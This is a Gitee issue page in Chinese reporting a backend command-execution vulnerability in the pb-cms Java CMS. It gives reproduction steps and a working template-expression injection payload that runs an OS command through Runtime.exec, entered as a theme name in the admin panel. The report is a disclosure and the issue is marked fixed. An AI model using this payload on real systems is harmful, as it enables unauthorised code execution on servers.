134 Star 1.4K Fork 594

LinZhaoguan/pb-cms

 / 详情

pb-cms存在后台命令执行漏洞

已完成
创建于  
2022-04-09 18:20

网站管理->主题管理->新增
payload填在主题名称

__${T(Runtime).getRuntime().exec("calc")}__::.x

输入图片说明

启用主题后,访问网站前台
输入图片说明

触发表达式注入

输入图片说明

评论 (1)

popko 创建了任务 3年前
popko 修改了描述 3年前
popko 修改了描述 3年前
LinZhaoguan 任务状态待办的 修改为进行中 3年前
popko 任务状态进行中 修改为已完成 2年前
展开全部操作日志

登录 后才可以发表评论

状态
负责人
里程碑
Pull Requests
关联的 Pull Requests 被合并后可能会关闭此 issue
分支
开始日期   -   截止日期
-
置顶选项
优先级
参与者(1)
popko-pipimi110
Java
1
https://gitee.com/LinZhaoguan/pb-cms.git
git@gitee.com:LinZhaoguan/pb-cms.git
LinZhaoguan
pb-cms
pb-cms

搜索帮助